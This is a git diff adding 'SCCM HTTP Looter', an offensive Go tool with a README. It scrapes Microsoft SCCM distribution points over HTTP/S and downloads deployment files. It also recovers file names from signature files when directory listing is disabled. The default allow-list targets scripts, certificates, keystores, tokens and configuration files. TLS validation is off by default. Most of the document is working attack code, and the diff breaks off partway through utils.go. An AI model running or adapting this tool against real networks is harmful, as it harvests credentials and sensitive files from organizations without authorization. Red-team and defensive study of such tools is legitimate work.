diff --git a/.gititgnore b/.gititgnore new file mode 100644 index 0000000..4998212 --- /dev/null +++ b/.gititgnore @@ -0,0 +1,70 @@ +# Binaries for programs and plugins +*.exe +*.exe~ +*.dll +*.so +*.dylib + +# Test binary, built with `go test -c` +*.test + +# Output of the go coverage tool, specifically when used with LiteIDE +*.out + +# Dependency directories (remove the comment below to include it) +# vendor/ + +# Go workspace file +go.work + +### macOS ### +# General +.DS_Store +.AppleDouble +.LSOverride + +# Icon must end with two \r +Icon + + +# Thumbnails +._* + +# Files that might appear in the root of a volume +.DocumentRevisions-V100 +.fseventsd +.Spotlight-V100 +.TemporaryItems +.Trashes +.VolumeIcon.icns +.com.apple.timemachine.donotpresent + +# Directories potentially created on remote AFP share +.AppleDB +.AppleDesktop +Network Trash Folder +Temporary Items +.apdisk + +### macOS Patch ### +# iCloud generated files +*.icloud + +### VisualStudioCode ### +.vscode/* +!.vscode/settings.json +!.vscode/tasks.json +!.vscode/launch.json +!.vscode/extensions.json +!.vscode/*.code-snippets + +# Local History for Visual Studio Code +.history/ + +# Built Visual Studio Code Extensions +*.vsix + +### VisualStudioCode Patch ### +# Ignore all local history of files +.history +.ionide diff --git a/LICENSE b/LICENSE new file mode 100644 index 0000000..c1115a1 --- /dev/null +++ b/LICENSE @@ -0,0 +1,7 @@ +Copyright (c) 2024 Bad Sector Labs + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/README.md b/README.md new file mode 100644 index 0000000..6ad6670 --- /dev/null +++ b/README.md @@ -0,0 +1,49 @@ +# SCCM HTTP Looter + +## How it works + +SCCM distribution points (DPs) are the servers used by Microsoft SCCM to host all the files used in software installs, patches, script deployments, etc. +By default, these servers allow access via SMB (TCP/445) and HTTP/S (TCP/80 and/or TCP/443) and require some type of Windows authentication (i.e. NTLM). + +The current SCCM DP looting tools rely on the ability to browse SMB shares to collect files. + +- [CMloot](https://github.com/1njected/CMLoot) +- [cmloot](https://github.com/shelltrail/cmloot) + +However, it is not uncommon for an organization to limit inbound SMB access to servers on internal networks, and standard practice to prevent inbound SMB access from the internet. HTTP/S access on the other hand is usually not restricted on internal networks, and often allowed from the internet. This presents an opportunity for an attacker if there is a way to get files from the SCCM DP via HTTP/S. + +### Why hasn't anyone done this before? + +The SMB tools work by enumerating the `DataLib` folder of the `SCCMContentLib$` share to find `.INI` files which contain the hash of the file. They can then locate the actual file at `FileLib//`. This works because with access to the share, you can enumerate all files in the `DataLib` folder. + +Using HTTP/S, things are different. Browsing to `http:///SMS_DP_SMSPKG$/Datalib` shows a directory listing of numbered files and INIs. + +For a variety of reasons (like [speed](https://old.reddit.com/r/SCCM/comments/5c4niq/sccm_2012_osd_download_faster_with_anonymous/)), these distribution points can be configured to allow anonymous access. + +![](./imgs/iis-settings.png) + +However, navigating to the non-INI links simply shows the same page, which limits the number of files directly accessible to those in the "root" directory of the Datalib as the hashes extracted from the INI files for directories cannot be used to find the directories in the FileLib since it only stores actual files. + +![](./imgs/datalib.png) + +However, browsing to the directory name directly off the `http:///SMS_DP_SMSPKG$/` root will show files in that directory, which can be directly downloaded. + +![](./imgs/direct-url.png) + +This is how the `sccm-http-looter` works normally. It parses the Datalib directory listing for directories, then requests those and parses each for any files, before downloading any files with extensions that are in the allow list specified by the user. + +In the case where anonymous access is enabled but directory listing for directories off the `http:///SMS_DP_SMSPKG$/` root are disabled, there is a second technique to retrieve files that can be used by running the tool with `-use-signature-method`. In this mode the tool does the following: + +1. Downloads the Datalib listing from `http:///SMS_DP_SMSPKG$/Datalib` +2. Parses the Datalib for all links +3. Downloads any non .INI link filenames from `http:///SMS_DP_SMSSIG$/.tar`, where `` is the final element in any href from the Datalib page (i.e. `12300005.1`) +4. Extracts the actual file name from the .tar signature file +5. Downloads the INI file from `http:///SMS_DP_SMSPKG$/Datalib//.INI` +6. Extracts the hash from the INI file +7. Downloads the actual file from `http:///SMS_DP_SMSPKG$//` renaming it to the correct file name as specified in the signature file. + +The signature files are `.tar` files but are not actual tars. They contain filenames 512 bytes before the byte string `0x18, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01` as shown below. + +![](./imgs/signature-hex.png) + +The tool searches for this byte string and extracts all file names from the signature files. diff --git a/download.go b/download.go new file mode 100644 index 0000000..4daef56 --- /dev/null +++ b/download.go @@ -0,0 +1,208 @@ +package main + +import ( + "crypto/sha256" + "encoding/hex" + "errors" + "fmt" + "io" + "log/slog" + "net/http" + "os" + "path/filepath" + "strings" + "sync" +) + +func getDatalibListing(server, outputDir string) (string, error) { + // Ensure the base output directory exists + if err := os.MkdirAll(outputDir, os.ModePerm); err != nil { + slog.Error(fmt.Sprintf("Error creating base output directory: %v\n", err)) + return "", err + } + + url := fmt.Sprintf("%s/SMS_DP_SMSPKG$/Datalib", urlBase) + slog.Info(fmt.Sprintf("Getting Datalib listing from %s...\n", url)) + + response, err := customHTTPClient.Get(url) + if err != nil { + slog.Error(fmt.Sprintf("Error sending GET request: %v\n", err)) + return "", err + } + defer response.Body.Close() + + if response.StatusCode != http.StatusOK { + slog.Error(fmt.Sprintf("Received non-OK status code: %v\n", response.Status)) + return "", fmt.Errorf("received non-OK status code: %v", response.Status) + } + + body, err := io.ReadAll(response.Body) + if err != nil { + slog.Error(fmt.Sprintf("Error reading response body: %v\n", err)) + slog.Error(fmt.Sprintf(` + +Try to download the Datalib manually with curl: +curl -k -A 'sccm-http-looter' %s > datalib.html +then run sccmlooter with '-datalib datalib.html' + +`, url)) + return "", errors.New("error reading response body") + } + + outputFileName := filepath.Join(outputDir, server+"_Datalib.txt") + + err = os.WriteFile(outputFileName, body, 0644) + if err != nil { + slog.Error(fmt.Sprintf("Error writing to file: %v\n", err)) + return "", err + } + + slog.Debug(fmt.Sprintf("Data saved to %s\n", outputFileName)) + return string(body), nil +} + +func downloadINIAndFile(outPath, outPathFiles, filename, dirName string, wg *sync.WaitGroup, semaphore chan struct{}) { + defer func() { + // Read one struct from the semaphore channel to "let go" of one slot/thread + <-semaphore + wg.Done() + }() + + outputPath := filepath.Join(outPath, filename+".INI") + url := fmt.Sprintf("%s/SMS_DP_SMSPKG$/Datalib/%s/%s.INI", urlBase, dirName, filename) + + err := downloadFileFromURL(url, outputPath) + if err != nil { + slog.Debug(fmt.Sprintf("Error downloading %s: %v\n", filename+".INI", err)) + return + } + + slog.Debug(fmt.Sprintf("Downloaded %s to %s\n", filename+".INI", outputPath)) + hash, err := getHashFromINI(outputPath) + if err != nil { + slog.Debug(fmt.Sprintf("Error getting Hash from INI file %s: %v", outputPath, err)) + return + } + + // Get the actual file by its hash but save it to the correct name + if strings.Contains(filename, "/") { + filename = filepath.Base(filename) + } + outputPathFile := filepath.Join(outPathFiles, hash[0:4]+"_sig_"+filename) + fileURL := fmt.Sprintf("%s/SMS_DP_SMSPKG$/FileLib/%s/%s", urlBase, hash[0:4], hash) + + err = downloadFileFromURL(fileURL, outputPathFile) + if err != nil { + slog.Debug(fmt.Sprintf("Error downloading %s/%s: %v\n", hash[0:4], hash, err)) + return + } + + slog.Debug(fmt.Sprintf("Downloaded %s to %s\n", filename, outputPathFile)) + +} + +func downloadFileFromURL(url, outputPath string) error { + slog.Debug(fmt.Sprintf("Downloading %s", url)) + // Send HTTP GET request to the URL + response, err := customHTTPClient.Get(url) + if err != nil { + return err + } + defer response.Body.Close() + + // Check if the response status code is OK + if response.StatusCode != http.StatusOK { + return fmt.Errorf("HTTP request failed with status code: %d", response.StatusCode) + } + // Create or truncate the output file + file, err := os.Create(outputPath) + if err != nil { + return err + } + defer file.Close() + + // Copy the response body to the output file + _, err = io.Copy(file, response.Body) + if err != nil { + return err + } + + return nil +} + +func getURL(url string) (string, error) { + slog.Debug(fmt.Sprintf("Getting %s\n", url)) + + response, err := customHTTPClient.Get(url) + if err != nil { + slog.Debug(fmt.Sprintf("Error sending GET request: %v\n", err)) + return "", err + } + defer response.Body.Close() + + if response.StatusCode != http.StatusOK { + slog.Debug(fmt.Sprintf("Received non-OK status code: %v\n", response.Status)) + return "", err + } + + body, err := io.ReadAll(response.Body) + if err != nil { + slog.Debug(fmt.Sprintf("Error reading response body: %v\n", err)) + return "", err + } + return string(body), nil +} + +func downloadFileFromURLAsHashName(url, outputDir string, wg *sync.WaitGroup, semaphore chan struct{}) error { + defer func() { + // Read one struct from the semaphore channel to "let go" of one slot/thread + <-semaphore + wg.Done() + }() + var outputPath string + parts := strings.Split(url, "/") + if !(len(parts) > 0) { + slog.Debug(fmt.Sprintf("could not get file name from URL: %s", url)) + return fmt.Errorf("could not get file name from URL: %s", url) + } + + slog.Debug(fmt.Sprintf("Downloading %s", url)) + + // Send HTTP GET request to the URL + response, err := customHTTPClient.Get(url) + if err != nil { + slog.Debug(fmt.Sprintf("%v", err)) + return err + } + defer response.Body.Close() + + // Check if the response status code is OK + if response.StatusCode != http.StatusOK { + slog.Debug(fmt.Sprintf("HTTP request failed with status code: %d", response.StatusCode)) + return fmt.Errorf("HTTP request failed with status code: %d", response.StatusCode) + } + content, err := io.ReadAll(response.Body) + if err != nil { + slog.Debug(fmt.Sprintf("%v", err)) + return err + } + + // Hash the file in memory + hasher := sha256.New() + hasher.Write(content) + hash := strings.ToUpper(hex.EncodeToString(hasher.Sum(nil))) + + // Append the hash to the beginning of the file name + outputPath = filepath.Join(outputDir, hash[0:4]+"_url_"+parts[len(parts)-1]) + + slog.Debug(fmt.Sprintf("Output path: %s", outputPath)) + + // Write the response body to the output file + err = os.WriteFile(outputPath, content, 0644) + if err != nil { + slog.Debug(fmt.Sprintf("%v", err)) + return err + } + + return nil +} diff --git a/file.go b/file.go new file mode 100644 index 0000000..57a1a00 --- /dev/null +++ b/file.go @@ -0,0 +1,133 @@ +package main + +import ( + "bufio" + "fmt" + "log/slog" + "os" + "path/filepath" + "strings" + + "gopkg.in/ini.v1" +) + +func walkDir(signaturesDir string) []string { + // Initialize a slice to store the file paths + filePaths := []string{} + + // Define the function to be called for each file or directory found + walkFn := func(path string, info os.FileInfo, err error) error { + if err != nil { + slog.Error(fmt.Sprintf("Error walking path %s: %v\n", path, err)) + return nil + } + + // Check if it's a regular file (not a directory) + if !info.IsDir() { + filePaths = append(filePaths, path) + } + + return nil + } + + // Recursively walk the directory and collect file paths + err := filepath.Walk(signaturesDir, walkFn) + if err != nil { + slog.Error(fmt.Sprintf("Error walking directory: %v\n", err)) + return nil + } + return filePaths +} + +func getHashFromINI(filePath string) (string, error) { + cfg, err := ini.Load(filePath) + if err != nil { + return "", err + } + + section := cfg.Section("File") + if section == nil { + return "", fmt.Errorf("section 'File' not found in the INI file") + } + + hashValue := section.Key("Hash").String() + return hashValue, nil +} + +func getFileNamesFromSignatureFile(filePath string) ([]string, error) { + // Open the binary file + file, err := os.Open(filePath) + if err != nil { + return nil, err + } + defer file.Close() + + // Read the entire file into memory + fileInfo, err := file.Stat() + if err != nil { + return nil, err + } + fileSize := fileInfo.Size() + fileData := make([]byte, fileSize) + _, err = file.Read(fileData) + if err != nil { + return nil, err + } + + // Define the byte signature to search for + signature := []byte{0x18, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01} + + // Initialize a slice to store the file strings where the signature is found + strings := []string{} + + // Search for the signature in the file data + for i := 0; i < (len(fileData) - len(signature)); i++ { + if bytesEqual(fileData[i:i+len(signature)], signature) { + // Calculate the start offset for the string (512 bytes before the signature) + startOffset := i - 512 + if startOffset < 0 { + startOffset = 0 + } + + // Find the end of the string (up to the first null byte) + endOffset := startOffset + for endOffset < len(fileData) && fileData[endOffset] != 0x00 { + endOffset++ + } + + // Extract the string + stringBytes := fileData[startOffset:endOffset] + + strings = append(strings, string(stringBytes)) + } + } + + return strings, nil +} + +func writeStringArrayToFile(filePath string, stringArray []string) { + file, err := os.OpenFile(filePath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + fmt.Println("Error creating file:", err) + return + } + defer file.Close() + + // Create a buffered writer + writer := bufio.NewWriter(file) + + // Join the strings with a newline character and write to the file + line := strings.Join(stringArray, "\n") + _, err = writer.WriteString(line) + if err != nil { + fmt.Println("Error writing to file:", err) + return + } + + // Flush the buffered writer to ensure all data is written + err = writer.Flush() + if err != nil { + fmt.Println("Error flushing writer:", err) + return + } +} diff --git a/go.mod b/go.mod new file mode 100644 index 0000000..42a82c4 --- /dev/null +++ b/go.mod @@ -0,0 +1,19 @@ +module sccmlooter + +go 1.22 + +require ( + golang.org/x/net v0.15.0 + gopkg.in/ini.v1 v1.67.0 +) + +require ( + github.com/k0kubun/go-ansi v0.0.0-20180517002512-3bf9e2903213 + github.com/mattn/go-isatty v0.0.20 // indirect + github.com/mitchellh/colorstring v0.0.0-20190213212951-d06e56a500db // indirect + github.com/rivo/uniseg v0.4.7 // indirect + github.com/schollz/progressbar/v3 v3.14.2 + github.com/stretchr/testify v1.9.0 // indirect + golang.org/x/sys v0.18.0 // indirect + golang.org/x/term v0.18.0 // indirect +) diff --git a/go.sum b/go.sum new file mode 100644 index 0000000..14d31ee --- /dev/null +++ b/go.sum @@ -0,0 +1,32 @@ +github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= +github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c= +github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= +github.com/k0kubun/go-ansi v0.0.0-20180517002512-3bf9e2903213 h1:qGQQKEcAR99REcMpsXCp3lJ03zYT1PkRd3kQGPn9GVg= +github.com/k0kubun/go-ansi v0.0.0-20180517002512-3bf9e2903213/go.mod h1:vNUNkEQ1e29fT/6vq2aBdFsgNPmy8qMdSay1npru+Sw= +github.com/mattn/go-isatty v0.0.20 h1:xfD0iDuEKnDkl03q4limB+vH+GxLEtL/jb4xVJSWWEY= +github.com/mattn/go-isatty v0.0.20/go.mod h1:W+V8PltTTMOvKvAeJH7IuucS94S2C6jfK/D7dTCTo3Y= +github.com/mitchellh/colorstring v0.0.0-20190213212951-d06e56a500db h1:62I3jR2EmQ4l5rM/4FEfDWcRD+abF5XlKShorW5LRoQ= +github.com/mitchellh/colorstring v0.0.0-20190213212951-d06e56a500db/go.mod h1:l0dey0ia/Uv7NcFFVbCLtqEBQbrT4OCwCSKTEv6enCw= +github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= +github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= +github.com/rivo/uniseg v0.4.7 h1:WUdvkW8uEhrYfLC4ZzdpI2ztxP1I582+49Oc5Mq64VQ= +github.com/rivo/uniseg v0.4.7/go.mod h1:FN3SvrM+Zdj16jyLfmOkMNblXMcoc8DfTHruCPUcx88= +github.com/schollz/progressbar/v3 v3.14.2 h1:EducH6uNLIWsr560zSV1KrTeUb/wZGAHqyMFIEa99ks= +github.com/schollz/progressbar/v3 v3.14.2/go.mod h1:aQAZQnhF4JGFtRJiw/eobaXpsqpVQAftEQ+hLGXaRc4= +github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= +github.com/stretchr/testify v1.3.0/go.mod h1:M5WIy9Dh21IEIfnGCwXGc5bZfKNJtfHm1UVUgZn+9EI= +github.com/stretchr/testify v1.9.0 h1:HtqpIVDClZ4nwg75+f6Lvsy/wHu+3BoSGCbBAcpTsTg= +github.com/stretchr/testify v1.9.0/go.mod h1:r2ic/lqez/lEtzL7wO/rwa5dbSLXVDPFyf8C91i36aY= +golang.org/x/net v0.15.0 h1:ugBLEUaxABaB5AJqW9enI0ACdci2RUd4eP51NTBvuJ8= +golang.org/x/net v0.15.0/go.mod h1:idbUs1IY1+zTqbi8yxTbhexhEEk5ur9LInksu6HrEpk= +golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/sys v0.17.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA= +golang.org/x/sys v0.18.0 h1:DBdB3niSjOA/O0blCZBqDefyWNYveAYMNF1Wum0DYQ4= +golang.org/x/sys v0.18.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA= +golang.org/x/term v0.17.0/go.mod h1:lLRBjIVuehSbZlaOtGMbcMncT+aqLLLmKrsjNrUguwk= +golang.org/x/term v0.18.0 h1:FcHjZXDMxI8mM3nwhX9HlKop4C0YQvCVCdwYl2wOtE8= +golang.org/x/term v0.18.0/go.mod h1:ILwASektA3OnRv7amZ1xhE/KTR+u50pbXfZ03+6Nx58= +gopkg.in/ini.v1 v1.67.0 h1:Dgnx+6+nfE+IfzjUEISNeydPJh9AXNNsWbGP9KzCsOA= +gopkg.in/ini.v1 v1.67.0/go.mod h1:pNLf8WUiyNEtQjuu5G5vTm06TEv9tsIgeAvK8hOrP4k= +gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA= +gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= diff --git a/html.go b/html.go new file mode 100644 index 0000000..878454c --- /dev/null +++ b/html.go @@ -0,0 +1,35 @@ +package main + +import ( + "strings" + + "golang.org/x/net/html" +) + +func extractFileNames(htmlContent string) []string { + var fileNames []string + + tokenizer := html.NewTokenizer(strings.NewReader(htmlContent)) + + for { + tokenType := tokenizer.Next() + + switch tokenType { + case html.ErrorToken: + return fileNames + case html.StartTagToken, html.SelfClosingTagToken: + token := tokenizer.Token() + if token.Data == "a" { + for _, attr := range token.Attr { + if attr.Key == "href" { + // Extract the file name from the href attribute + fileName := extractFileName(attr.Val) + if fileName != "" { + fileNames = append(fileNames, fileName) + } + } + } + } + } + } +} diff --git a/http-client.go b/http-client.go new file mode 100644 index 0000000..6d0ba55 --- /dev/null +++ b/http-client.go @@ -0,0 +1,51 @@ +package main + +import ( + "crypto/tls" + "fmt" + "log/slog" + "net/http" + "os" + "time" +) + +func createCustomHTTPClient(userAgent string, validate bool, httpTimeout string) http.Client { + transport := &http.Transport{ + DisableKeepAlives: true, + TLSClientConfig: &tls.Config{ + Renegotiation: tls.RenegotiateOnceAsClient, + InsecureSkipVerify: validate, + }, + } + + customTimeout, err := time.ParseDuration(httpTimeout) + if err != nil { + slog.Error(fmt.Sprintf("Unable to parse HTTP Timeout value: %s", httpTimeout)) + os.Exit(1) + } + + // Create a custom http.Client + client := &http.Client{ + Timeout: customTimeout, + Transport: transport, + } + + // Set the User-Agent header globally for this client + client.Transport = &customTransport{ + Transport: transport, + UserAgent: userAgent, + } + + return *client +} + +// customTransport is a custom http.RoundTripper that sets the User-Agent header +type customTransport struct { + Transport http.RoundTripper + UserAgent string +} + +func (t *customTransport) RoundTrip(req *http.Request) (*http.Response, error) { + req.Header.Set("User-Agent", t.UserAgent) + return t.Transport.RoundTrip(req) +} diff --git a/imgs/datalib.png b/imgs/datalib.png new file mode 100644 index 0000000..95337d3 Binary files /dev/null and b/imgs/datalib.png differ diff --git a/imgs/direct-url.png b/imgs/direct-url.png new file mode 100644 index 0000000..67a9626 Binary files /dev/null and b/imgs/direct-url.png differ diff --git a/imgs/iis-settings.png b/imgs/iis-settings.png new file mode 100644 index 0000000..a7dca23 Binary files /dev/null and b/imgs/iis-settings.png differ diff --git a/imgs/signature-hex.png b/imgs/signature-hex.png new file mode 100644 index 0000000..57eab6c Binary files /dev/null and b/imgs/signature-hex.png differ diff --git a/main.go b/main.go new file mode 100644 index 0000000..1277882 --- /dev/null +++ b/main.go @@ -0,0 +1,178 @@ +package main + +import ( + "flag" + "fmt" + "log/slog" + "net/http" + "os" + "path/filepath" + "strings" + "sync" + + "github.com/k0kubun/go-ansi" + "github.com/schollz/progressbar/v3" +) + +var customHTTPClient http.Client +var urlBase string + +func main() { + protocol := flag.String("protocol", "http", "The protocol (http or https)") + server := flag.String("server", "127.0.0.1", "The IP address or hostname of the SCCM DP") + port := flag.String("port", "80", "The port of the HTTP(S) server on the SCCM DP") + outputDir := flag.String("output", "./loot", "The base output directory for files related to this DP") + fileAllowList := flag.String("allow", "ps1,vbs,txt,cmd,bat,pfx,pem,cer,certs,expect,sql,xml,ps1xml,config,ini,ksh,sh,rsh,py,keystore,reg,yml,yaml,token,script,sqlite,plist,au3,cfg", "A comma-separated list of file extensions (no dot) to allow. Use 'all' to allow all file types") + numThreads := flag.Int("threads", 1, "Number of threads (goroutines) for concurrent downloading") + validate := flag.Bool("validate", false, "Validate HTTPS certificates") + datalibPath := flag.String("datalib", "", "Path to a DataLib directory listing download (for cases where the listing cannot be retrieved with this tool)") + signaturesPath := flag.String("signatures", "", "Path to a directory containing .tar signatures (for cases where you want to reprocess a server without having to re-download signatures)") + downloadNoExt := flag.Bool("downloadnoext", false, "Download files without a file extension") + userAgent := flag.String("useragent", "sccm-http-looter", "User agent to use for all requests") + httpTimeout := flag.String("timeout", "10s", "HTTP timeout value, use a number + 'ms', 's', 'm', or 'h' for values") + randomize := flag.Bool("randomize", false, "randomize the order of requests for signatures and files") + verbose := flag.Bool("verbose", false, "print debug/error statements") + signatureMethod := flag.Bool("use-signature-method", false, "get filenames from signature files") + urlsPath := flag.String("urlsPath", "", "Path to a file containing URLs (for cases where you want to reprocess downloads without re-scraping the URLs)") + + flag.Parse() + + slog.Info("SCCM HTTP Looter by Bad Sector Labs (@badsectorlabs)") + + allowExtensions := strings.Split(*fileAllowList, ",") + + customHTTPClient = createCustomHTTPClient(*userAgent, !*validate, *httpTimeout) + + urlBase = fmt.Sprintf("%s://%s:%s", *protocol, *server, *port) + + if *verbose { + slog.SetLogLoggerLevel(slog.LevelDebug) + } + + // Get the DataLib HTML content from the server or from disk + var datalibBody string + if *datalibPath == "" { + var err error + datalibBody, err = getDatalibListing(*server, *outputDir) + if err != nil { + if strings.Contains(err.Error(), "401") { + writeStringArrayToFile(filepath.Join(*outputDir, "401"), []string{}) + } else if strings.Contains(err.Error(), "404") { + writeStringArrayToFile(filepath.Join(*outputDir, "404"), []string{}) + } else if strings.Contains(err.Error(), "error reading response body") { + writeStringArrayToFile(filepath.Join(*outputDir, "body error"), []string{}) + } + return + } + } else { + content, err := os.ReadFile(*datalibPath) + if err != nil { + slog.Error(fmt.Sprintf("Unable to read file: %s", *datalibPath)) + return + } + datalibBody = string(content) + } + fileNames := extractFileNames(datalibBody) + // Use the filenames from Datalib to pull down signature files, parse them, and finally download files + if *signatureMethod { + // Get all the signature files from the server, or a gather a list from disk + var filePaths []string + if *signaturesPath == "" { + getSignatures(*outputDir, fileNames, *numThreads, *randomize) + filePaths = walkDir(filepath.Join(*outputDir, "signatures")) + if filePaths == nil { + slog.Error("No signature files found!") + return + } + } else { + filePaths = walkDir(*signaturesPath) + } + + if *randomize { + randomizeStrings(filePaths) + } + + bar := progressbar.NewOptions(len(filePaths), + progressbar.OptionSetWriter(ansi.NewAnsiStdout()), + progressbar.OptionEnableColorCodes(true), + progressbar.OptionShowBytes(false), + progressbar.OptionShowCount(), + progressbar.OptionShowElapsedTimeOnFinish(), + progressbar.OptionSetWidth(30), + progressbar.OptionSetDescription("[cyan][2/2][reset] Getting files..."), + progressbar.OptionSetTheme(progressbar.Theme{ + Saucer: "[green]=[reset]", + SaucerHead: "[green]>[reset]", + SaucerPadding: " ", + BarStart: "[", + BarEnd: "]", + })) + + totalFiles := 0 + // Get all the file names from every signature, then download the INI and finally the binary + for _, filePath := range filePaths { + bar.Add(1) + + fileNames, err := getFileNamesFromSignatureFile(filePath) + if err != nil { + slog.Error("Error:", err) + continue + } + // Save filenames to disk + writeStringArrayToFile(filepath.Join(*outputDir, *server+"_files.txt"), fileNames) + totalFiles += len(fileNames) + // Download all the wanted files + downloadFiles(*outputDir, filePath, fileNames, allowExtensions, *downloadNoExt, *numThreads, *randomize) + } + bar.Finish() + } else { // URL method + // Just use the datalib to loop over directories and look for files directly + slog.Info(fmt.Sprintf("Found %d Directories in the Datalib", len(fileNames))) + if *urlsPath == "" { + allFileURLs := getAllFileURLsFromDirNames(fileNames, *numThreads, *randomize) + writeStringArrayToFile(filepath.Join(*outputDir, *server+"_urls.txt"), allFileURLs) + } else { + slog.Info(fmt.Sprintf("Using provided URLs file: %s", *urlsPath)) + content, err := os.ReadFile(*urlsPath) + if err != nil { + slog.Error(fmt.Sprintf("Unable to read file: %s", *urlsPath)) + return + } + allFileURLs = strings.Split(string(content), "\n") + } + bar := progressbar.NewOptions(len(allFileURLs), + progressbar.OptionSetWriter(ansi.NewAnsiStdout()), + progressbar.OptionEnableColorCodes(true), + progressbar.OptionShowBytes(false), + progressbar.OptionShowCount(), + progressbar.OptionShowElapsedTimeOnFinish(), + progressbar.OptionSetWidth(30), + progressbar.OptionSetDescription("[cyan][2/2][reset] Getting files..."), + progressbar.OptionSetTheme(progressbar.Theme{ + Saucer: "[green]=[reset]", + SaucerHead: "[green]>[reset]", + SaucerPadding: " ", + BarStart: "[", + BarEnd: "]", + })) + var wg sync.WaitGroup + wg.Add(len(allFileURLs)) + + // Create a channel to limit the number of concurrent downloads + semaphore := make(chan struct{}, *numThreads) + + for _, fileURL := range allFileURLs { + bar.Add(1) + wanted, outputDir := fileWanted(allowExtensions, *downloadNoExt, extractFileName(fileURL), *outputDir) + if wanted { + // Add an empty struct to the semaphore channel to "take up" one slot/thread + semaphore <- struct{}{} + go downloadFileFromURLAsHashName(fileURL, outputDir, &wg, semaphore) + } + } + bar.Finish() + } + + slog.Info("SCCM Looting complete!") + +} diff --git a/signature.go b/signature.go new file mode 100644 index 0000000..61b540c --- /dev/null +++ b/signature.go @@ -0,0 +1,84 @@ +package main + +import ( + "fmt" + "log/slog" + "os" + "path/filepath" + "strings" + "sync" + + "github.com/k0kubun/go-ansi" + "github.com/schollz/progressbar/v3" +) + +func getSignatures(outputDir string, filenames []string, numThreads int, randomize bool) { + + // Ensure the output directory exists + if err := os.MkdirAll(filepath.Join(outputDir, "signatures"), os.ModePerm); err != nil { + slog.Error(fmt.Sprintf("Error creating base output directory: %v\n", err)) + return + } + + // Create a wait group to wait for all goroutines to finish + var wg sync.WaitGroup + wg.Add(len(filenames)) + + // Create a channel to limit the number of concurrent downloads + semaphore := make(chan struct{}, numThreads) + + if randomize { + randomizeStrings(filenames) + } + + bar := progressbar.NewOptions(len(filenames), + progressbar.OptionSetWriter(ansi.NewAnsiStdout()), + progressbar.OptionEnableColorCodes(true), + progressbar.OptionShowBytes(false), + progressbar.OptionShowCount(), + progressbar.OptionShowElapsedTimeOnFinish(), + progressbar.OptionSetWidth(30), + progressbar.OptionSetDescription("[cyan][1/2][reset] Getting signature files..."), + progressbar.OptionSetTheme(progressbar.Theme{ + Saucer: "[green]=[reset]", + SaucerHead: "[green]>[reset]", + SaucerPadding: " ", + BarStart: "[", + BarEnd: "]", + })) + + // Iterate over the filenames and download the files + for _, filename := range filenames { + bar.Add(1) + // Skip INI files as they never have signatures - reduces requests by half! + if strings.HasSuffix(filename, ".INI") { + wg.Done() // Still need to decrement the wg as we used all file names for the wg size + continue + } + + // Add an empty struct to the semaphore channel to "take up" one slot/thread + semaphore <- struct{}{} + + go func(filename string) { + defer func() { + // Read one struct from the semaphore channel to "let go" of one slot/thread + <-semaphore + wg.Done() + }() + + url := fmt.Sprintf("%s/SMS_DP_SMSSIG$/%s.tar", urlBase, filename) + outputPath := filepath.Join(outputDir, "signatures", filename+".tar") + + // Download the file + err := downloadFileFromURL(url, outputPath) + if err != nil { + slog.Debug(fmt.Sprintf("Error downloading signature %s.tar: %v\n", filename, err)) + return + } + + slog.Debug(fmt.Sprintf("Downloaded %s to %s\n", filename, outputPath)) + }(filename) + } + wg.Wait() + bar.Finish() +} diff --git a/utils.go b/utils.go new file mode 100644 index 0000000..0a5d632 --- /dev/null +++ b/utils.go @@ -0,0 +1,251 @@ +package main + +import ( + "fmt" + "log/slog" + "math/rand" + "os" + "path/filepath" + "regexp" + "slices" + "sort" + "strings" + "sync" + "time" + + "github.com/k0kubun/go-ansi" + "github.com/schollz/progressbar/v3" +) + +var allFileURLs []string + +func downloadFiles(outputDir, filePath string, fileNames, allowExtensions []string, downloadNoExt bool, numThreads int, randomize bool) { + filenameWithExt := filepath.Base(filePath) + dirName := strings.TrimSuffix(filenameWithExt, filepath.Ext(filenameWithExt)) + + outPath := filepath.Join(outputDir, "inis", dirName) + // Ensure the output directory exists for inis + if err := os.MkdirAll(outPath, os.ModePerm); err != nil { + 